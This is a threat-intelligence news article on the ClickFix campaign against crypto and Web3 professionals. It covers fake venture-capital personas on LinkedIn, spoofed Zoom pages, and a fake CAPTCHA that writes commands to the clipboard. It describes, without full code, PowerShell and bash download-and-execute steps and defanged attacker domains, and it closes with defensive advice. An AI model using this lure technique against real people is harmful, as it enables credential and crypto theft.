A sophisticated malware campaign, dubbed ClickFix, is actively targeting cryptocurrency and Web3 professionals by leveraging social engineering tactics, fake venture capital firms, and spoofed video conferencing links. This operation, first observed in early 2026, manipulates victims into executing malicious commands on their own devices, effectively turning them into unwitting participants in the attack chain. The primary objective appears to be the theft of credentials and sensitive information within the rapidly evolving digital asset landscape.
The ClickFix campaign commences on LinkedIn, where threat actors impersonate individuals with fabricated identities. One such persona, Mykhailo Hureiev, presents himself as the Co-Founder and Managing Partner of a non-existent investment firm named SolidBit Capital. To establish a facade of legitimacy, the attackers reference the target’s public involvement in crypto or DeFi communities. The conversation then escalates to a proposed meeting, with a Calendly link that, upon clicking, silently redirects the victim to a convincing imitation of a Zoom meeting login page designed to deliver malware.
Moonlock analysts, who initially identified and tracked the campaign, have traced the malicious infrastructure to a single registrant: Anatolli Bigdasch of Boston, Massachusetts, associated with the email anatollibigdasch0717[at]gmail[.]com. Beyond SolidBit Capital, researchers have uncovered two additional fictitious entities, MegaBit and Lumax Capital. These entities are supported by polished websites, AI-generated professional headshots, and fabricated company histories, indicating a deliberate and coordinated effort to build credibility and deceive targets.
The domain lumax[.]capital, registered in February 2026, suggests that the threat actors are proactively establishing new identities to deploy as their current ones, like SolidBit Capital, become compromised or exposed. This forward-thinking approach highlights the persistent nature of the ClickFix operation and its adaptability in evading detection.
The campaign is notable for delivering cross-platform payloads, affecting both Windows and macOS operating systems. Evidence of the attack’s mechanics surfaced on January 9, 2026, when a victim, identified by the X handle @0xbigdan, shared screenshots detailing the social engineering process. These screenshots revealed pivotal red flags, including the attacker joining a legitimate Google Meet call, remaining silent, and abruptly disconnecting when questioned by the victim. The operational patterns observed in the ClickFix campaign bear a striking resemblance to activities previously attributed to UNC1069, a threat actor group with suspected ties to North Korea that has been tracked since 2018, although definitive attribution for ClickFix remains open.
The ClickFix Delivery Mechanism Explained
The core of the ClickFix attack lies in its ingenious delivery mechanism, which transforms a seemingly ordinary interaction into a full device compromise. Once a victim clicks on the fraudulent Zoom or Google Meet link, they are directed to a webpage mimicking legitimate platforms. These spoofed pages often resemble real conference event listings, such as “The Digital Asset Conference III,” or typosquatting attempts of established financial news outlets like Hedgeweek. The goal is to create a plausible scenario for the user to proceed.
Overlaying these deceptive pages is a fake Cloudflare “I’m not a robot” verification module. Crucially, this CAPTCHA is constructed entirely from local HTML and CSS, lacking any connection to actual Cloudflare infrastructure. This serves as the final lure, prompting the victim to interact with a system that appears familiar and secure.
The moment a user clicks the checkbox within this fake verification, a silent JavaScript command is executed. This script leverages the `navigator.clipboard.writeText()` function to stealthily write a malicious command directly to the user’s clipboard. The script then analyzes the browser’s User-Agent string to determine the victim’s operating system, ensuring the delivery of a compatible payload.
For Windows users, the clipboard is populated with a PowerShell command designed for stealth. This command hides its window, bypasses system execution policies, and utilizes `Invoke-Expression` to execute a remote script directly in memory. This technique ensures that no malicious files are written to disk, significantly hindering detection by traditional antivirus software.
On macOS, the attack proceeds with a bash one-liner. This command first checks for and installs Homebrew if Python 3 is not present. Subsequently, it downloads a Python script from the command-and-control server hosted at hedgeweeks[.]online and executes it using `nohup bash`. The `nohup` command ensures that the malicious process continues to run even after the terminal window is closed, maintaining persistence on the compromised system.
Moonlock researchers have analyzed two Mach-O binaries associated with this campaign. The first is a heavily obfuscated 9.3 MB file, intentionally padded with extraneous code to overwhelm static analysis tools like Ghidra. The second is a smaller, 37.6 KB non-obfuscated version that retains the same core malicious logic. Both binaries demonstrated zero detections across all major antivirus vendors on VirusTotal for an extended period, confirming that advanced evasion techniques are central to the operation’s success in avoiding detection.
Professionals in the cryptocurrency and Web3 sectors are advised to exercise extreme caution when receiving unsolicited messages on platforms like LinkedIn, particularly those pertaining to investment opportunities or partnerships. It is imperative to verify the legitimacy of companies and individuals before engaging. Checking the registration dates of company domains and scrutinizing team photos for signs of AI generation can provide valuable clues. Furthermore, any external Zoom or Calendly links should be scanned through a URL scanner prior to clicking. Never paste commands into a terminal as part of any verification process, as legitimate services would not request such actions. Finally, any communication that exhibits urgency, pressure to move off the platform, or instructions to execute commands on your device should be treated as a significant red flag, and users should disengage immediately.